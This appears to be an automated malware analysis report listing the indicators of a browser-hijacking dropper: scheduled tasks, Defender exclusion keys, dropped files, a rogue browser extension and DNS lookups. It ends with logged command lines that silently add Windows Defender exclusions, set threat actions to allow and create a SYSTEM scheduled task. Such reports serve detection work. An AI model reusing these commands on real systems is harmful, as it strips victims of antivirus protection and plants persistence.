Technical Information
- %WINDIR%\tasks\bdfuuwxjhgramzpmkb.job
- <SYSTEM32>\tasks\bdfuuwxjhgramzpmkb
- <SYSTEM32>\tasks\gbftrakrg
- %WINDIR%\tasks\nzkpodfymwfuezgiy.job
- <SYSTEM32>\tasks\nzkpodfymwfuezgiy
- %WINDIR%\tasks\aasozdwqwskhqgp.job
- <SYSTEM32>\tasks\aasozdwqwskhqgp
- <SYSTEM32>\tasks\aasozdwqwskhqgp2
- <SYSTEM32>\tasks\mwapefojzuxilu
- <SYSTEM32>\tasks\shsqfzqzgggao2
- <SYSTEM32>\tasks\ariazdppspwgyjirw2
- <SYSTEM32>\tasks\vtgyjtpjfvtywubcytk2
- %WINDIR%\tasks\yvmmshetqaekcgulr.job
- <SYSTEM32>\tasks\yvmmshetqaekcgulr
- <SYSTEM32>\tasks\adtuh1
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\HhaNBGcuU' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\HhaNBGcuU' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IXzVmqJFDmDU2' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\IXzVmqJFDmDU2' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lJjXfKfpJVtdC' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lJjXfKfpJVtdC' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\tzdhLHbIjrNAUNTyxhR' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\tzdhLHbIjrNAUNTyxhR' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vlxHtUmyEJUn' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vlxHtUmyEJUn' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\rHwmoXVaXOEgCaVB' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\rHwmoXVaXOEgCaVB' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Extensions' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Extensions' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\nnEaZCbtCuWmFnyZt' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\nnEaZCbtCuWmFnyZt' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\MWApEFojzuXiLU' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\MWApEFojzuXiLU' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\ShsqfzqZgGGaO2' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\ShsqfzqZgGGaO2' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\aasozdWqwSKHqgP' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\aasozdWqwSKHqgP' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\aasozdWqwSKHqgP2' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\aasozdWqwSKHqgP2' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\arIazdpPSpwgyJiRw2' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\arIazdpPSpwgyJiRw2' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\vTGyjTpJfVtyWubCYtk2' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>\Tasks\vTGyjTpJfVtyWubCYtk2' = '00000000'
- [HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\apVYxgZOEctSApDE' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\apVYxgZOEctSApDE' = '00000000'
- <SYSTEM32>\windowspowershell\v1.0\powershell.exe
- firefox.exe
- %TEMP%\7zsd216.tmp\__data__\config.txt
- %TEMP%\7zsd216.tmp\config.exe
- %TEMP%\7zsd216.tmp\install.exe
- %TEMP%\nneazcbtcuwmfnyzt\cdbnkvgfxzenadn\hecuutq.exe
- %ALLUSERSPROFILE%\microsoft\crypto\rsa\s-1-5-18\d42cc0c3858a58db2db37658219e6400_8cf7b530-613e-439b-a8c5-ccfc0e745400
- %WINDIR%\temp\__psscriptpolicytest_hutpirfw.rnc.ps1
- %WINDIR%\temp\__psscriptpolicytest_x4532hr0.lax.psm1
- %WINDIR%\syswow64\config\systemprofile\appdata\local\microsoft\windows\powershell\startupprofiledata-noninteractive
- %WINDIR%\temp\__psscriptpolicytest_pzv34wnw.kye.ps1
- %WINDIR%\temp\__psscriptpolicytest_jnqz43uq.s32.psm1
- <SYSTEM32>\grouppolicy\machine\registry.pol
- <SYSTEM32>\grouppolicy\gpt.ini
- %WINDIR%\temp\apvyxgzoectsapde\alirxhirylhjcgj\smljxvh.exe
- %ProgramFiles(x86)%\hhanbgcuu\ysvfeq.dll
- C:\$recycle.bin\s-1-5-18\desktop.ini
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\prefs.js_temppivata
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\permissions.sqlite-journal
- %ProgramFiles%\mozilla firefox\browser\features\{85fd6ace-3736-491b-8514-6c8c9556e131}.xpi
- %ProgramFiles%\mozilla firefox\browser\omni.ja.bak
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\icons\ficon128.png
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\icons\icon128.png
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\icons\icon16.png
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\icons\icon48.png
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\main.js
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\manifest.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\am\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\ar\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\be\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\bg\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\bn\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\ca\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\cs\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\da\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\de\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\el\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\en\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\en_gb\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\en_us\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\es\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\es_419\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\et\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\fa\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\fi\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\fil\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\fr\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\gu\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\he\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\hi\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\hr\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\hu\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\id\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\it\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\ja\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\kn\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\ko\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\lt\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\lv\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\mk\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\ml\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\mr\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\ms\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\nl\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\no\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\pl\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\pt\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\pt_br\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\pt_pt\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\ro\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\ru\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\sk\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\sl\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\sq\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\sr\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\sv\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\sw\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\ta\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\te\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\th\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\tr\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\uk\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\vi\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\zh_cn\messages.json
- %LOCALAPPDATA%\microsoft\edge\user data\default\extensions\hncoaagegcdnajffjpkldhfceipfgnnf\1.6.88_0\_locales\zh_tw\messages.json
- %ProgramFiles(x86)%\hhanbgcuu\gvrpxng.xml
- %ProgramFiles(x86)%\ixzvmqjfdmdu2\iyyshvzfhetqh.dll
- %ProgramFiles(x86)%\ixzvmqjfdmdu2\eoyyubj.xml
- %ALLUSERSPROFILE%\rhwmoxvaxoegcavb\ddhryse.wsf
- %ALLUSERSPROFILE%\rhwmoxvaxoegcavb\slxyybg.xml
- %ProgramFiles(x86)%\tzdhlhbijrnauntyxhr\dosnmfz.dll
- %ProgramFiles(x86)%\tzdhlhbijrnauntyxhr\ldcmemf.xml
- %ProgramFiles(x86)%\ljjxfkfpjvtdc\uzakcme.dll
- %ProgramFiles(x86)%\ljjxfkfpjvtdc\wswapfr.xml
- %ProgramFiles(x86)%\vlxhtumyejun\kfrgjpz.dll
- %WINDIR%\temp\apvyxgzoectsapde\xizfqwzf\wmtuzxo.dll
- %APPDATA%\mozilla\firefox\profiles\mlxv8edx.default\searchplugins\cdnsearch.xml
- %APPDATA%\mozilla\firefox\profiles\mlxv8edx.default\search-metadata.json
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\searchplugins\cdnsearch.xml
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\search-metadata.json
- %WINDIR%\temp\__psscriptpolicytest_hutpirfw.rnc.ps1
- %WINDIR%\temp\__psscriptpolicytest_x4532hr0.lax.psm1
- %WINDIR%\temp\__psscriptpolicytest_pzv34wnw.kye.ps1
- %WINDIR%\temp\__psscriptpolicytest_jnqz43uq.s32.psm1
- <SYSTEM32>\tasks\gbftrakrg
- %WINDIR%\tasks\bdfuuwxjhgramzpmkb.job
- <SYSTEM32>\tasks\bdfuuwxjhgramzpmkb
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\prefs.js_temppivata
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\permissions.sqlite-journal
- %ProgramFiles(x86)%\hhanbgcuu\gvrpxng.xml
- %WINDIR%\tasks\aasozdwqwskhqgp.job
- <SYSTEM32>\tasks\aasozdwqwskhqgp
- %ProgramFiles(x86)%\ixzvmqjfdmdu2\eoyyubj.xml
- %ALLUSERSPROFILE%\rhwmoxvaxoegcavb\slxyybg.xml
- %ProgramFiles(x86)%\tzdhlhbijrnauntyxhr\ldcmemf.xml
- %ProgramFiles(x86)%\ljjxfkfpjvtdc\wswapfr.xml
- <SYSTEM32>\tasks\adtuh1
- %TEMP%\7zsd216.tmp\config.exe
- %TEMP%\7zsd216.tmp\install.exe
- %TEMP%\7zsd216.tmp\__data__\config.txt
- %WINDIR%\tasks\nzkpodfymwfuezgiy.job
- <SYSTEM32>\tasks\nzkpodfymwfuezgiy
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\addonstartup.json.lz4
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\prefs.js
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\permissions.sqlite
- %ProgramFiles%\mozilla firefox\browser\omni.ja
- %LOCALAPPDATA%\microsoft\edge\user data\default\preferences
- %LOCALAPPDATA%\microsoft\edge\user data\default\secure preferences
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\search.json.mozlz4
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\favicons.sqlite-wal
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\favicons.sqlite
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\places.sqlite-wal
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\places.sqlite
- %LOCALAPPDATA%\google\chrome\user data\default\favicons-journal
- %LOCALAPPDATA%\google\chrome\user data\default\favicons
- %LOCALAPPDATA%\google\chrome\user data\default\history-journal
- %LOCALAPPDATA%\google\chrome\user data\default\history
- %LOCALAPPDATA%\microsoft\edge\user data\default\favicons-journal
- %LOCALAPPDATA%\microsoft\edge\user data\default\favicons
- %LOCALAPPDATA%\microsoft\edge\user data\default\history-journal
- %LOCALAPPDATA%\microsoft\edge\user data\default\history
- %APPDATA%\mozilla\firefox\profiles\dnyauhh1.default-release\permissions.sqlite-journal
- %LOCALAPPDATA%\Google\Chrome\User Data\Default\Favicons-journal
- %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Favicons-journal
- %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\History-journal
- 'localhost':49697
- DNS ASK se####e-domain.xyz
- DNS ASK clients2.google.com
- DNS ASK ap#.###managehost.com
- ClassName: 'Mozilla_firefox_default-release_RemoteWindow' WindowName: ''
- '%TEMP%\7zsd216.tmp\install.exe'
- '%TEMP%\7zsd216.tmp\config.exe' /GmiMdidaIOJa "452799" /S
- '%TEMP%\nneazcbtcuwmfnyzt\cdbnkvgfxzenadn\hecuutq.exe' Ow /nkdidP 452799 /S
- '%WINDIR%\temp\apvyxgzoectsapde\alirxhirylhjcgj\smljxvh.exe' Nl /qOmydidhe 452799 /S
- '%WINDIR%\syswow64\cmd.exe' /C forfiles /p <SYSTEM32> /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=T...
- '%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
- '%WINDIR%\syswow64\cmd.exe' powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "bdFUuWXJhGRaMzPmKB" /SC once /ST 01:44:00 /RU "SYSTEM" /TR "\"%TEMP%\nnEaZCbtCuWmFnyZt\CDbnKvgFxZeNAdN\HEcUuTQ.exe\" Ow /nkdidP 452799 /S" /V1 /F
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
- '%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=dll Force=True"
- '%WINDIR%\syswow64\cmd.exe' powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=dll Force=True
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=dll Force=True
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=dll Force=True
- '%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
- '%WINDIR%\syswow64\cmd.exe' powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows De...
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
